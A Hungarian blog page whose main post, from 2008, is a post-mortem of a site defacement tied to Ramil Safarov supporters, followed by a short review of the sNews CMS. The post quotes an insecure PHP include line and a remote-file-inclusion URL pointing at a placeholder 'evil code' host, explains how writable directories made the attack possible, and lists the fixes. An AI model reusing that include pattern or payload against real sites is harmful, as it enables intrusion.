ramil safarov

Nos, Ramil Safarov egy érdekes ember. Azonkívül, hogy sokan láthattátok hasonlatosságát Csányi Sándor ünnepelt szinészünknel, egy örmény társának életét vette egy baltával. Ennek ellenére, vagy éppen ezért Azerbajdzsánban az Év Embere lett.

Weboldala három nyelven köszönti az olvasókat, köztük magyarul is. Ennek oka gondolom az, hogy tudomásom szerint még mindig nálunk van fogva tartva. Naprakész információval nem rendelkezem, pedig igyekeztem utánajárni a dolognak.

A dolgot szőnyeg alá seperhettük volna, s hallgathatnék a hibáinkról, de úgy érzem jobb ide leírni, hogy mi is, s Ti is tanulhassatok belőle.

És most akkor a technikai bla-bla. A deface-t három dolog együttállásának köszönhettük. Egy nem éppen biztonságos php include parancsot az egyik domainen, illetve két kényelmi szolgáltatást kihasználva sikerült elérni, hogy önakaratunkon kívül sikerült betársulnunk Ramil szabadításáért küzdők népes táborába.

"include_once($_GET[oldal]."_".$_SESSION[lang].".php");" kód tanult kollégám szerint kiváló lehetőséget nyújt a rosszindulatú emberünknek, hogy a index.php?oldal=http://oldalam.com/gonosz-kodom.php?semmi= szöveg címsorba írása után http://oldalam.com/gonosz-kodom.php?semmi=_hu.php -t inklúdolja (mi erre a szép magyar szó), s lefuttassa. (a domain, illetve a kód tulajdonosát értesítettük, hogy javítsa ki, távolítsa azt el az oldalról.)

Ezzel emberünk a webszerver jogaival tudott fájlokat létrehozni. S valóban tudott is, mert kényelmi okokból sok domainen biztosítottuk az írásjogot. És, hogy a dolog még szebb legyen egy nemrég felkerült domain kedvéért létezett egy aldomain, amivel a teljes wwwroot bejárható volt. (megszüntettük az írásjogot, mindenkinek magának kell ezután engedélyezni, ha szeretné, hogy fel tudjon tölteni, stb. Az aldomaint szintén megszüntettük)

Tanulság: Kiskaput nem nyitunk, vagy ha igen, azonnal bezárjuk. A dolog előnye viszont, hogy íly módon minden cms a legfrissebbre lett upgrade-elve, ezzel csökkentve egy következő akció sikerességét. Frissült a teljes rendszer, minden, ami lehetett.

És akkor a végére az állandó kérdés, hogy mi a helyes arány a biztonság és a használhatóság között?

2008. 05. 28. @ 14:24 | , , , , , and  | 4 Komment

sNews

Kedvenc német nyelvű techblogom a sw-guide írt nemrég az sNews névre hallgató CMS-ről. Azelőtt a nevét se hallottam, de gondoltam letöltöm és kipróbálom.

A rendszer teljes mérete nem nagyobb, mint 26,2 kb. Mindennel együtt. Ez már eleve érdekessé tette a dolgot. A telepítés szintén nem nehéz. Nincs installer, csak megkérnek, hogy dobd be az sql adatbázisodba az általuk előre elkészített kódot. Ezzel az összes szükséges tábla elkészül.

Belépéshez kapsz egy test felhasználót, test jelszóval. Az oldalról ötletes és szép css template-eket is letölthetünk. Természetesen magunk is csinálhatunk.

Ahogy Michael is írja blogoláshoz egyetlen hiánya van, hogy trackbacket (még?) nem tud. Persze sokan vannak, akik ezt a funkciót eredetileg is kikapcsolják, s ezzel sok spamtől fosszák meg magukat.

Tehát mindenkinek, aki CMS választáson töri a fejét, ajánlom kipróbálni az sNews-t. Igéretes projekt. Ja, és további érdekessége, hogy itt fejlesztik a “szomszédban”.

2006. 11. 04. @ 12:17 | , , , and  | 0 Komment

 1

További bejegyzések

Last.fm

  • last.fm
  • last.fm
  • last.fm
  • last.fm
  • last.fm
  • last.fm

Tags